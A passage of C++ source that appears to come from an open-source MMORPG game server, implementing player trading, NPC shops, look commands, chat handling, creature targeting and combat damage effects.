TRADE_NONE && tradePartner->tradePartner != player) { player->sendCancelMessage(RETURNVALUE_THISPLAYERISALREADYTRADING); return false; } player->tradePartner = tradePartner; player->tradeItem = tradeItem; player->tradeState = TRADE_INITIATED; tradeItem->incrementReferenceCounter(); tradeItems[tradeItem] = player->getID(); player->sendTradeItemRequest(player->getName(), tradeItem, true); if (tradePartner->tradeState == TRADE_NONE) { tradePartner->sendTextMessage(MESSAGE_EVENT_ADVANCE, fmt::format("{:s} wants to trade with you.", player->getName())); tradePartner->tradeState = TRADE_ACKNOWLEDGE; tradePartner->tradePartner = player; } else { Item* counterOfferItem = tradePartner->tradeItem; player->sendTradeItemRequest(tradePartner->getName(), counterOfferItem, false); tradePartner->sendTradeItemRequest(player->getName(), tradeItem, false); } return true; } void Game::playerAcceptTrade(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!(player->getTradeState() == TRADE_ACKNOWLEDGE || player->getTradeState() == TRADE_INITIATED)) { return; } Player* tradePartner = player->tradePartner; if (!tradePartner) { return; } player->setTradeState(TRADE_ACCEPT); if (tradePartner->getTradeState() == TRADE_ACCEPT) { if (!canThrowObjectTo(tradePartner->getPosition(), player->getPosition(), true, true)) { internalCloseTrade(player, false); player->sendCancelMessage(RETURNVALUE_CANNOTTHROW); tradePartner->sendCancelMessage(RETURNVALUE_CANNOTTHROW); return; } Item* playerTradeItem = player->tradeItem; Item* partnerTradeItem = tradePartner->tradeItem; if (!g_events->eventPlayerOnTradeAccept(player, tradePartner, playerTradeItem, partnerTradeItem)) { internalCloseTrade(player, false); return; } player->setTradeState(TRADE_TRANSFER); tradePartner->setTradeState(TRADE_TRANSFER); auto it = tradeItems.find(playerTradeItem); if (it != tradeItems.end()) { ReleaseItem(it->first); tradeItems.erase(it); } it = tradeItems.find(partnerTradeItem); if (it != tradeItems.end()) { ReleaseItem(it->first); tradeItems.erase(it); } bool isSuccess = false; ReturnValue tradePartnerRet = RETURNVALUE_NOERROR; ReturnValue playerRet = RETURNVALUE_NOERROR; // if player is trying to trade its own backpack if (tradePartner->getInventoryItem(CONST_SLOT_BACKPACK) == partnerTradeItem) { tradePartnerRet = (tradePartner->getInventoryItem(getSlotType(Item::items[playerTradeItem->getID()])) ? RETURNVALUE_NOTENOUGHROOM : RETURNVALUE_NOERROR); } if (player->getInventoryItem(CONST_SLOT_BACKPACK) == playerTradeItem) { playerRet = (player->getInventoryItem(getSlotType(Item::items[partnerTradeItem->getID()])) ? RETURNVALUE_NOTENOUGHROOM : RETURNVALUE_NOERROR); } if (tradePartnerRet == RETURNVALUE_NOERROR && playerRet == RETURNVALUE_NOERROR) { tradePartnerRet = internalAddItem(tradePartner, playerTradeItem, INDEX_WHEREEVER, 0, true); playerRet = internalAddItem(player, partnerTradeItem, INDEX_WHEREEVER, 0, true); if (tradePartnerRet == RETURNVALUE_NOERROR && playerRet == RETURNVALUE_NOERROR) { playerRet = internalRemoveItem(playerTradeItem, playerTradeItem->getItemCount(), true); tradePartnerRet = internalRemoveItem(partnerTradeItem, partnerTradeItem->getItemCount(), true); if (tradePartnerRet == RETURNVALUE_NOERROR && playerRet == RETURNVALUE_NOERROR) { tradePartnerRet = internalMoveItem(playerTradeItem->getParent(), tradePartner, INDEX_WHEREEVER, playerTradeItem, playerTradeItem->getItemCount(), nullptr, FLAG_IGNOREAUTOSTACK, nullptr, partnerTradeItem); if (tradePartnerRet == RETURNVALUE_NOERROR) { internalMoveItem(partnerTradeItem->getParent(), player, INDEX_WHEREEVER, partnerTradeItem, partnerTradeItem->getItemCount(), nullptr, FLAG_IGNOREAUTOSTACK); playerTradeItem->onTradeEvent(ON_TRADE_TRANSFER, tradePartner); partnerTradeItem->onTradeEvent(ON_TRADE_TRANSFER, player); isSuccess = true; } } } } if (!isSuccess) { std::string errorDescription; if (tradePartner->tradeItem) { errorDescription = getTradeErrorDescription(tradePartnerRet, playerTradeItem); tradePartner->sendTextMessage(MESSAGE_EVENT_ADVANCE, errorDescription); tradePartner->tradeItem->onTradeEvent(ON_TRADE_CANCEL, tradePartner); } if (player->tradeItem) { errorDescription = getTradeErrorDescription(playerRet, partnerTradeItem); player->sendTextMessage(MESSAGE_EVENT_ADVANCE, errorDescription); player->tradeItem->onTradeEvent(ON_TRADE_CANCEL, player); } } g_events->eventPlayerOnTradeCompleted(player, tradePartner, playerTradeItem, partnerTradeItem, isSuccess); player->setTradeState(TRADE_NONE); player->tradeItem = nullptr; player->tradePartner = nullptr; player->sendTradeClose(); tradePartner->setTradeState(TRADE_NONE); tradePartner->tradeItem = nullptr; tradePartner->tradePartner = nullptr; tradePartner->sendTradeClose(); } } std::string Game::getTradeErrorDescription(ReturnValue ret, Item* item) { if (item) { if (ret == RETURNVALUE_NOTENOUGHCAPACITY) { return fmt::format("You do not have enough capacity to carry {:s}.\n {:s}", item->isStackable() && item->getItemCount() > 1 ? "these objects" : "this object", item->getWeightDescription()); } else if (ret == RETURNVALUE_NOTENOUGHROOM || ret == RETURNVALUE_CONTAINERNOTENOUGHROOM) { return fmt::format("You do not have enough room to carry {:s}.", item->isStackable() && item->getItemCount() > 1 ? "these objects" : "this object"); } } return "Trade could not be completed."; } void Game::playerLookInTrade(uint32_t playerId, bool lookAtCounterOffer, uint8_t index) { Player* player = getPlayerByID(playerId); if (!player) { return; } Player* tradePartner = player->tradePartner; if (!tradePartner) { return; } Item* tradeItem; if (lookAtCounterOffer) { tradeItem = tradePartner->getTradeItem(); } else { tradeItem = player->getTradeItem(); } if (!tradeItem) { return; } const Position& playerPosition = player->getPosition(); const Position& tradeItemPosition = tradeItem->getPosition(); int32_t lookDistance = std::max<int32_t>(Position::getDistanceX(playerPosition, tradeItemPosition), Position::getDistanceY(playerPosition, tradeItemPosition)); if (index == 0) { g_events->eventPlayerOnLookInTrade(player, tradePartner, tradeItem, lookDistance); return; } Container* tradeContainer = tradeItem->getContainer(); if (!tradeContainer) { return; } std::vector<const Container*> containers {tradeContainer}; size_t i = 0; while (i < containers.size()) { const Container* container = containers[i++]; for (Item* item : container->getItemList()) { Container* tmpContainer = item->getContainer(); if (tmpContainer) { containers.push_back(tmpContainer); } if (--index == 0) { g_events->eventPlayerOnLookInTrade(player, tradePartner, item, lookDistance); return; } } } } void Game::playerCloseTrade(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } internalCloseTrade(player); } void Game::internalCloseTrade(Player* player, bool sendCancel/* = true*/) { Player* tradePartner = player->tradePartner; if ((tradePartner && tradePartner->getTradeState() == TRADE_TRANSFER) || player->getTradeState() == TRADE_TRANSFER) { return; } if (player->getTradeItem()) { auto it = tradeItems.find(player->getTradeItem()); if (it != tradeItems.end()) { ReleaseItem(it->first); tradeItems.erase(it); } player->tradeItem->onTradeEvent(ON_TRADE_CANCEL, player); player->tradeItem = nullptr; } player->setTradeState(TRADE_NONE); player->tradePartner = nullptr; if (sendCancel) { player->sendTextMessage(MESSAGE_STATUS_SMALL, "Trade cancelled."); } player->sendTradeClose(); if (tradePartner) { if (tradePartner->getTradeItem()) { auto it = tradeItems.find(tradePartner->getTradeItem()); if (it != tradeItems.end()) { ReleaseItem(it->first); tradeItems.erase(it); } tradePartner->tradeItem->onTradeEvent(ON_TRADE_CANCEL, tradePartner); tradePartner->tradeItem = nullptr; } tradePartner->setTradeState(TRADE_NONE); tradePartner->tradePartner = nullptr; if (sendCancel) { tradePartner->sendTextMessage(MESSAGE_STATUS_SMALL, "Trade cancelled."); } tradePartner->sendTradeClose(); } } void Game::playerPurchaseItem(uint32_t playerId, uint16_t spriteId, uint8_t count, uint8_t amount, bool ignoreCap/* = false*/, bool inBackpacks/* = false*/) { if (amount == 0 || amount > 100) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } int32_t onBuy, onSell; Npc* merchant = player->getShopOwner(onBuy, onSell); if (!merchant) { return; } const ItemType& it = Item::items.getItemIdByClientId(spriteId); if (it.id == 0) { return; } uint8_t subType; if (it.isSplash() || it.isFluidContainer()) { subType = clientFluidToServer(count); } else { subType = count; } if (!player->hasShopItemForSale(it.id, subType)) { return; } merchant->onPlayerTrade(player, onBuy, it.id, subType, amount, ignoreCap, inBackpacks); } void Game::playerSellItem(uint32_t playerId, uint16_t spriteId, uint8_t count, uint8_t amount, bool ignoreEquipped) { if (amount == 0 || amount > 100) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } int32_t onBuy, onSell; Npc* merchant = player->getShopOwner(onBuy, onSell); if (!merchant) { return; } const ItemType& it = Item::items.getItemIdByClientId(spriteId); if (it.id == 0) { return; } uint8_t subType; if (it.isSplash() || it.isFluidContainer()) { subType = clientFluidToServer(count); } else { subType = count; } merchant->onPlayerTrade(player, onSell, it.id, subType, amount, ignoreEquipped); } void Game::playerCloseShop(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->closeShopWindow(); } void Game::playerLookInShop(uint32_t playerId, uint16_t spriteId, uint8_t count) { Player* player = getPlayerByID(playerId); if (!player) { return; } int32_t onBuy, onSell; Npc* merchant = player->getShopOwner(onBuy, onSell); if (!merchant) { return; } const ItemType& it = Item::items.getItemIdByClientId(spriteId); if (it.id == 0) { return; } int32_t subType; if (it.isFluidContainer() || it.isSplash()) { subType = clientFluidToServer(count); } else { subType = count; } if (!player->hasShopItemForSale(it.id, subType)) { return; } const std::string& description = Item::getDescription(it, 1, nullptr, subType); g_events->eventPlayerOnLookInShop(player, &it, subType, description); } void Game::playerLookAt(uint32_t playerId, const Position& pos, uint8_t stackPos) { Player* player = getPlayerByID(playerId); if (!player) { return; } Thing* thing = internalGetThing(player, pos, stackPos, 0, STACKPOS_LOOK); if (!thing) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Position thingPos = thing->getPosition(); if (!player->canSee(thingPos)) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Position playerPos = player->getPosition(); int32_t lookDistance; if (thing != player) { lookDistance = std::max<int32_t>(Position::getDistanceX(playerPos, thingPos), Position::getDistanceY(playerPos, thingPos)); if (playerPos.z != thingPos.z) { lookDistance += 15; } } else { lookDistance = -1; } g_events->eventPlayerOnLook(player, pos, thing, stackPos, lookDistance); } void Game::playerLookInBattleList(uint32_t playerId, uint32_t creatureId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Creature* creature = getCreatureByID(creatureId); if (!creature) { return; } if (!player->canSeeCreature(creature)) { return; } const Position& creaturePos = creature->getPosition(); if (!player->canSee(creaturePos)) { return; } int32_t lookDistance; if (creature != player) { const Position& playerPos = player->getPosition(); lookDistance = std::max<int32_t>(Position::getDistanceX(playerPos, creaturePos), Position::getDistanceY(playerPos, creaturePos)); if (playerPos.z != creaturePos.z) { lookDistance += 15; } } else { lookDistance = -1; } g_events->eventPlayerOnLookInBattleList(player, creature, lookDistance); } void Game::playerCancelAttackAndFollow(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } playerSetAttackedCreature(playerId, 0); playerFollowCreature(playerId, 0); player->stopWalk(); } void Game::playerSetAttackedCreature(uint32_t playerId, uint32_t creatureId) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (player->getAttackedCreature() && creatureId == 0) { player->setAttackedCreature(nullptr); player->sendCancelTarget(); return; } Creature* attackCreature = getCreatureByID(creatureId); if (!attackCreature) { player->setAttackedCreature(nullptr); player->sendCancelTarget(); return; } ReturnValue ret = Combat::canTargetCreature(player, attackCreature); if (ret != RETURNVALUE_NOERROR) { player->sendCancelMessage(ret); player->sendCancelTarget(); player->setAttackedCreature(nullptr); return; } player->setAttackedCreature(attackCreature); g_dispatcher.addTask(createTask(std::bind(&Game::updateCreatureWalk, this, player->getID()))); } void Game::playerFollowCreature(uint32_t playerId, uint32_t creatureId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->setAttackedCreature(nullptr); g_dispatcher.addTask(createTask(std::bind(&Game::updateCreatureWalk, this, player->getID()))); player->setFollowCreature(getCreatureByID(creatureId)); } void Game::playerSetFightModes(uint32_t playerId, fightMode_t fightMode, bool chaseMode, bool secureMode) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->setFightMode(fightMode); player->setChaseMode(chaseMode); player->setSecureMode(secureMode); } void Game::playerRequestAddVip(uint32_t playerId, const std::string& name) { if (name.length() > 20) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } Player* vipPlayer = getPlayerByName(name); if (!vipPlayer) { uint32_t guid; bool specialVip; std::string formattedName = name; if (!IOLoginData::getGuidByNameEx(guid, specialVip, formattedName)) { player->sendTextMessage(MESSAGE_STATUS_SMALL, "A player with this name does not exist."); return; } if (specialVip && !player->hasFlag(PlayerFlag_SpecialVIP)) { player->sendTextMessage(MESSAGE_STATUS_SMALL, "You can not add this player."); return; } player->addVIP(guid, formattedName, VIPSTATUS_OFFLINE); } else { if (vipPlayer->hasFlag(PlayerFlag_SpecialVIP) && !player->hasFlag(PlayerFlag_SpecialVIP)) { player->sendTextMessage(MESSAGE_STATUS_SMALL, "You can not add this player."); return; } if (!vipPlayer->isInGhostMode() || player->canSeeGhostMode(vipPlayer)) { player->addVIP(vipPlayer->getGUID(), vipPlayer->getName(), VIPSTATUS_ONLINE); } else { player->addVIP(vipPlayer->getGUID(), vipPlayer->getName(), VIPSTATUS_OFFLINE); } } } void Game::playerRequestRemoveVip(uint32_t playerId, uint32_t guid) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->removeVIP(guid); } void Game::playerRequestEditVip(uint32_t playerId, uint32_t guid, const std::string& description, uint32_t icon, bool notify) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->editVIP(guid, description, icon, notify); } void Game::playerTurn(uint32_t playerId, Direction dir) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!g_events->eventPlayerOnTurn(player, dir)) { return; } player->resetIdleTime(); internalCreatureTurn(player, dir); } void Game::playerRequestOutfit(uint32_t playerId) { if (!g_config.getBoolean(ConfigManager::ALLOW_CHANGEOUTFIT)) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } player->sendOutfitWindow(); } void Game::playerToggleMount(uint32_t playerId, bool mount) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->toggleMount(mount); } void Game::playerChangeOutfit(uint32_t playerId, Outfit_t outfit) { if (!g_config.getBoolean(ConfigManager::ALLOW_CHANGEOUTFIT)) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } const Outfit* playerOutfit = Outfits::getInstance().getOutfitByLookType(player->getSex(), outfit.lookType); if (!playerOutfit) { outfit.lookMount = 0; } if (outfit.lookMount != 0) { Mount* mount = mounts.getMountByClientID(outfit.lookMount); if (!mount) { return; } if (!player->hasMount(mount)) { return; } if (player->isMounted()) { Mount* prevMount = mounts.getMountByID(player->getCurrentMount()); if (prevMount) { changeSpeed(player, mount->speed - prevMount->speed); } player->setCurrentMount(mount->id); } else { player->setCurrentMount(mount->id); outfit.lookMount = 0; } } else if (player->isMounted()) { player->dismount(); } if (player->canWear(outfit.lookType, outfit.lookAddons)) { player->defaultOutfit = outfit; if (player->hasCondition(CONDITION_OUTFIT)) { return; } internalCreatureChangeOutfit(player, outfit); } } void Game::playerShowQuestLog(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->sendQuestLog(); } void Game::playerShowQuestLine(uint32_t playerId, uint16_t questId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Quest* quest = quests.getQuestByID(questId); if (!quest) { return; } player->sendQuestLine(quest); } void Game::playerSay(uint32_t playerId, uint16_t channelId, SpeakClasses type, const std::string& receiver, const std::string& text) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->resetIdleTime(); if (playerSaySpell(player, type, text)) { return; } if (type == TALKTYPE_PRIVATE_PN) { playerSpeakToNpc(player, text); return; } uint32_t muteTime = player->isMuted(); if (muteTime > 0) { player->sendTextMessage(MESSAGE_STATUS_SMALL, fmt::format("You are still muted for {:d} seconds.", muteTime)); return; } if (!text.empty() && text.front() == '/' && player->isAccessPlayer()) { return; } player->removeMessageBuffer(); switch (type) { case TALKTYPE_SAY: internalCreatureSay(player, TALKTYPE_SAY, text, false); break; case TALKTYPE_WHISPER: playerWhisper(player, text); break; case TALKTYPE_YELL: playerYell(player, text); break; case TALKTYPE_PRIVATE_TO: case TALKTYPE_PRIVATE_RED_TO: playerSpeakTo(player, type, receiver, text); break; case TALKTYPE_CHANNEL_O: case TALKTYPE_CHANNEL_Y: case TALKTYPE_CHANNEL_R1: g_chat->talkToChannel(*player, type, text, channelId); break; case TALKTYPE_BROADCAST: playerBroadcastMessage(player, text); break; default: break; } } bool Game::playerSaySpell(Player* player, SpeakClasses type, const std::string& text) { std::string words = text; TalkActionResult_t result = g_talkActions->playerSaySpell(player, type, words); if (result == TALKACTION_BREAK) { return true; } result = g_spells->playerSaySpell(player, words); if (result == TALKACTION_BREAK) { if (!g_config.getBoolean(ConfigManager::EMOTE_SPELLS)) { return internalCreatureSay(player, TALKTYPE_SAY, words, false); } else { return internalCreatureSay(player, TALKTYPE_MONSTER_SAY, words, false); } } else if (result == TALKACTION_FAILED) { return true; } return false; } void Game::playerWhisper(Player* player, const std::string& text) { SpectatorVec spectators; map.getSpectators(spectators, player->getPosition(), false, false, Map::maxClientViewportX, Map::maxClientViewportX, Map::maxClientViewportY, Map::maxClientViewportY); //send to client for (Creature* spectator : spectators) { if (Player* spectatorPlayer = spectator->getPlayer()) { if (!Position::areInRange<1, 1>(player->getPosition(), spectatorPlayer->getPosition())) { spectatorPlayer->sendCreatureSay(player, TALKTYPE_WHISPER, "pspsps"); } else { spectatorPlayer->sendCreatureSay(player, TALKTYPE_WHISPER, text); } } } //event method for (Creature* spectator : spectators) { spectator->onCreatureSay(player, TALKTYPE_WHISPER, text); } } bool Game::playerYell(Player* player, const std::string& text) { if (player->hasCondition(CONDITION_YELLTICKS)) { player->sendCancelMessage(RETURNVALUE_YOUAREEXHAUSTED); return false; } if (!player->isAccessPlayer() && !player->hasFlag(PlayerFlag_IgnoreYellCheck)) { uint32_t minimumLevel = g_config.getNumber(ConfigManager::YELL_MINIMUM_LEVEL); if (player->getLevel() < minimumLevel) { if (g_config.getBoolean(ConfigManager::YELL_ALLOW_PREMIUM)) { if (!player->isPremium()) { player->sendTextMessage(MESSAGE_STATUS_SMALL, fmt::format("You may not yell unless you have reached level {:d} or have a premium account.", minimumLevel)); return false; } } else { player->sendTextMessage(MESSAGE_STATUS_SMALL, fmt::format("You may not yell unless you have reached level {:d}.", minimumLevel)); return false; } } Condition* condition = Condition::createCondition(CONDITIONID_DEFAULT, CONDITION_YELLTICKS, 30000, 0); player->addCondition(condition); } internalCreatureSay(player, TALKTYPE_YELL, asUpperCaseString(text), false); return true; } bool Game::playerSpeakTo(Player* player, SpeakClasses type, const std::string& receiver, const std::string& text) { Player* toPlayer = getPlayerByName(receiver); if (!toPlayer) { player->sendTextMessage(MESSAGE_STATUS_SMALL, "A player with this name is not online."); return false; } if (type == TALKTYPE_PRIVATE_RED_TO && (player->hasFlag(PlayerFlag_CanTalkRedPrivate) || player->getAccountType() >= ACCOUNT_TYPE_GAMEMASTER)) { type = TALKTYPE_PRIVATE_RED_FROM; } else { type = TALKTYPE_PRIVATE_FROM; } if (!player->isAccessPlayer() && !player->hasFlag(PlayerFlag_IgnoreSendPrivateCheck)) { uint32_t minimumLevel = g_config.getNumber(ConfigManager::MINIMUM_LEVEL_TO_SEND_PRIVATE); if (player->getLevel() < minimumLevel) { if (g_config.getBoolean(ConfigManager::PREMIUM_TO_SEND_PRIVATE)) { if (!player->isPremium()) { player->sendTextMessage(MESSAGE_STATUS_SMALL, fmt::format("You may not send private messages unless you have reached level {:d} or have a premium account.", minimumLevel)); return false; } } else { player->sendTextMessage(MESSAGE_STATUS_SMALL, fmt::format("You may not send private messages unless you have reached level {:d}.", minimumLevel)); return false; } } } toPlayer->sendPrivateMessage(player, type, text); toPlayer->onCreatureSay(player, type, text); if (toPlayer->isInGhostMode() && !player->canSeeGhostMode(toPlayer)) { player->sendTextMessage(MESSAGE_STATUS_SMALL, "A player with this name is not online."); } else { player->sendTextMessage(MESSAGE_STATUS_SMALL, fmt::format("Message sent to {:s}.", toPlayer->getName())); } return true; } void Game::playerSpeakToNpc(Player* player, const std::string& text) { SpectatorVec spectators; map.getSpectators(spectators, player->getPosition()); for (Creature* spectator : spectators) { if (spectator->getNpc()) { spectator->onCreatureSay(player, TALKTYPE_PRIVATE_PN, text); } } } //-- bool Game::canThrowObjectTo(const Position& fromPos, const Position& toPos, bool checkLineOfSight /*= true*/, bool sameFloor /*= false*/, int32_t rangex /*= Map::maxClientViewportX*/, int32_t rangey /*= Map::maxClientViewportY*/) const { return map.canThrowObjectTo(fromPos, toPos, checkLineOfSight, sameFloor, rangex, rangey); } bool Game::isSightClear(const Position& fromPos, const Position& toPos, bool sameFloor /*= false*/) const { return map.isSightClear(fromPos, toPos, sameFloor); } bool Game::internalCreatureTurn(Creature* creature, Direction dir) { if (creature->getDirection() == dir) { return false; } creature->setDirection(dir); //send to client SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureTurn(creature); } return true; } bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text, bool ghostMode, SpectatorVec* spectatorsPtr/* = nullptr*/, const Position* pos/* = nullptr*/) { if (text.empty()) { return false; } if (!pos) { pos = &creature->getPosition(); } SpectatorVec spectators; if (!spectatorsPtr || spectatorsPtr->empty()) { // This somewhat complex construct ensures that the cached SpectatorVec // is used if available and if it can be used, else a local vector is // used (hopefully the compiler will optimize away the construction of // the temporary when it's not used). if (type != TALKTYPE_YELL && type != TALKTYPE_MONSTER_YELL) { map.getSpectators(spectators, *pos, false, false, Map::maxClientViewportX, Map::maxClientViewportX, Map::maxClientViewportY, Map::maxClientViewportY); } else { map.getSpectators(spectators, *pos, true, false, (Map::maxClientViewportX * 2) + 2, (Map::maxClientViewportX * 2) + 2, (Map::maxClientViewportY * 2) + 2, (Map::maxClientViewportY * 2) + 2); } } else { spectators = (*spectatorsPtr); } //send to client for (Creature* spectator : spectators) { if (Player* tmpPlayer = spectator->getPlayer()) { if (!ghostMode || tmpPlayer->canSeeCreature(creature)) { tmpPlayer->sendCreatureSay(creature, type, text, pos); } } } //event method for (Creature* spectator : spectators) { spectator->onCreatureSay(creature, type, text); if (creature != spectator) { g_events->eventCreatureOnHear(spectator, creature, text, type); } } return true; } void Game::checkCreatureWalk(uint32_t creatureId) { Creature* creature = getCreatureByID(creatureId); if (creature && creature->getHealth() > 0) { creature->onWalk(); cleanup(); } } void Game::updateCreatureWalk(uint32_t creatureId) { Creature* creature = getCreatureByID(creatureId); if (creature && creature->getHealth() > 0) { creature->goToFollowCreature(); } } void Game::checkCreatureAttack(uint32_t creatureId) { Creature* creature = getCreatureByID(creatureId); if (creature && creature->getHealth() > 0) { creature->onAttacking(0); } } void Game::addCreatureCheck(Creature* creature) { creature->creatureCheck = true; if (creature->inCheckCreaturesVector) { // already in a vector return; } creature->inCheckCreaturesVector = true; checkCreatureLists[uniform_random(0, EVENT_CREATURECOUNT - 1)].push_back(creature); creature->incrementReferenceCounter(); } void Game::removeCreatureCheck(Creature* creature) { if (creature->inCheckCreaturesVector) { creature->creatureCheck = false; } } void Game::checkCreatures(size_t index) { g_scheduler.addEvent(createSchedulerTask(EVENT_CHECK_CREATURE_INTERVAL, std::bind(&Game::checkCreatures, this, (index + 1) % EVENT_CREATURECOUNT))); auto& checkCreatureList = checkCreatureLists[index]; auto it = checkCreatureList.begin(), end = checkCreatureList.end(); while (it != end) { Creature* creature = *it; if (creature->creatureCheck) { if (creature->getHealth() > 0) { creature->onThink(EVENT_CREATURE_THINK_INTERVAL); creature->onAttacking(EVENT_CREATURE_THINK_INTERVAL); creature->executeConditions(EVENT_CREATURE_THINK_INTERVAL); } ++it; } else { creature->inCheckCreaturesVector = false; it = checkCreatureList.erase(it); ReleaseCreature(creature); } } cleanup(); } void Game::changeSpeed(Creature* creature, int32_t varSpeedDelta) { int32_t varSpeed = creature->getSpeed() - creature->getBaseSpeed(); varSpeed += varSpeedDelta; creature->setSpeed(varSpeed); //send to clients SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), false, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendChangeSpeed(creature, creature->getStepSpeed()); } } void Game::internalCreatureChangeOutfit(Creature* creature, const Outfit_t& outfit) { if (!g_events->eventCreatureOnChangeOutfit(creature, outfit)) { return; } creature->setCurrentOutfit(outfit); if (creature->isInvisible()) { return; } //send to clients SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureChangeOutfit(creature, outfit); } } void Game::internalCreatureChangeVisible(Creature* creature, bool visible) { //send to clients SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureChangeVisible(creature, visible); } } void Game::changeLight(const Creature* creature) { //send to clients SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureLight(creature); } } bool Game::combatBlockHit(CombatDamage& damage, Creature* attacker, Creature* target, bool checkDefense, bool checkArmor, bool field, bool ignoreResistances /*= false */) { if (damage.primary.type == COMBAT_NONE && damage.secondary.type == COMBAT_NONE) { return true; } if (target->getPlayer() && target->isInGhostMode()) { return true; } if (damage.primary.value > 0) { return false; } static const auto sendBlockEffect = [this](BlockType_t blockType, CombatType_t combatType, const Position& targetPos) { if (blockType == BLOCK_DEFENSE) { addMagicEffect(targetPos, CONST_ME_POFF); } else if (blockType == BLOCK_ARMOR) { addMagicEffect(targetPos, CONST_ME_BLOCKHIT); } else if (blockType == BLOCK_IMMUNITY) { uint8_t hitEffect = 0; switch (combatType) { case COMBAT_UNDEFINEDDAMAGE: { return; } case COMBAT_ENERGYDAMAGE: case COMBAT_FIREDAMAGE: case COMBAT_PHYSICALDAMAGE: case COMBAT_ICEDAMAGE: case COMBAT_DEATHDAMAGE: { hitEffect = CONST_ME_BLOCKHIT; break; } case COMBAT_EARTHDAMAGE: { hitEffect = CONST_ME_GREEN_RINGS; break; } case COMBAT_HOLYDAMAGE: { hitEffect = CONST_ME_HOLYDAMAGE; break; } default: { hitEffect = CONST_ME_POFF; break; } } addMagicEffect(targetPos, hitEffect); } }; BlockType_t primaryBlockType, secondaryBlockType; if (damage.primary.type != COMBAT_NONE) { damage.primary.value = -damage.primary.value; primaryBlockType = target->blockHit(attacker, damage.primary.type, damage.primary.value, checkDefense, checkArmor, field, ignoreResistances); damage.primary.value = -damage.primary.value; sendBlockEffect(primaryBlockType, damage.primary.type, target->getPosition()); } else { primaryBlockType = BLOCK_NONE; } if (damage.secondary.type != COMBAT_NONE) { damage.secondary.value = -damage.secondary.value; secondaryBlockType = target->blockHit(attacker, damage.secondary.type, damage.secondary.value, false, false, field, ignoreResistances); damage.secondary.value = -damage.secondary.value; sendBlockEffect(secondaryBlockType, damage.secondary.type, target->getPosition()); } else { secondaryBlockType = BLOCK_NONE; } damage.blockType = primaryBlockType; return (primaryBlockType != BLOCK_NONE) && (secondaryBlockType != BLOCK_NONE); } void Game::combatGetTypeInfo(CombatType_t combatType, Creature* target, TextColor_t& color, uint8_t& effect) { switch (combatType) { case COMBAT_PHYSICALDAMAGE: { Item* splash = nullptr; switch (target->getRace()) { case RACE_VENOM: color = TEXTCOLOR_LIGHTGREEN; effect = CONST_ME_HITBYPOISON; splash = Item::CreateItem(ITEM_SMALLSPLASH, FLUID_SLIME); break; case RACE_BLOOD: color = TEXTCOLOR_RED; effect = CONST_ME_DRAWBLOOD; if (const Tile* tile = target->getTile()) { if (!tile->hasFlag(TILESTATE_PROTECTIONZONE)) { splash = Item::CreateItem(ITEM_SMALLSPLASH, FLUID_BLOOD); } } break; case RACE_UNDEAD: color = TEXTCOLOR_LIGHTGREY; effect = CONST_ME_HITAREA; break; case RACE_FIRE: color = TEXTCOLOR_ORANGE; effect = CONST_ME_DRAWBLOOD; break; case RACE_ENERGY: color = TEXTCOLOR_ELECTRICPURPLE; effect = CONST_ME_ENERGYHIT; break; default: color = TEXTCOLOR_NONE; effect = CONST_ME_NONE; break; } if (splash) { internalAddItem(target->getTile(), splash, INDEX_WHEREEVER, FLAG_NOLIMIT); startDecay(splash); } break; } case COMBAT_ENERGYDAMAGE: { color = TEXTCOLOR_ELECTRICPURPLE; effect = CONST_ME_ENERGYHIT; break; } case COMBAT_EARTHDAMAGE: { color = TEXTCOLOR_LIGHTGREEN; effect = CONST_ME_GREEN_RINGS; break; } case COMBAT_DROWNDAMAGE: { color = TEXTCOLOR_LIGHTBLUE; effect = CONST_ME_LOSEENERGY; break; } case COMBAT_FIREDAMAGE: { color = TEXTCOLOR_ORANGE; effect = CONST_ME_HITBYFIRE; break; } case COMBAT_ICEDAMAGE: { color = TEXTCOLOR_SKYBLUE; effect = CONST_ME_ICEATTACK; break; } case COMBAT_HOLYDAMAGE: { color = TEXTCOLOR_YELLOW; effect = CONST_ME_HOLYDAMAGE; break; } case COMBAT_DEATHDAMAGE: { color = TEXTCOLOR_DARKRED; effect = CONST_ME_SMALLCLOUDS; break; } case COMBAT_LIFEDRAIN: { color = TEXTCOLOR_RED; effect = CONST_ME_MAGIC_RED; break; } default: { color = TEXTCOLOR_NONE; effect = CONST_ME_NONE; break; } } } bool Game::combatChangeHealth(Creature* attacker, Creature* target, CombatDamage& damage) { const Position& targetPos = target->getPosition(); if (damage.primary.value > 0) { if (target->getHealth() <= 0) { return false; } Player* attackerPlayer; if (attacker) { attackerPlayer = attacker->getPlayer(); } else { attackerPlayer = nullptr; } Player* 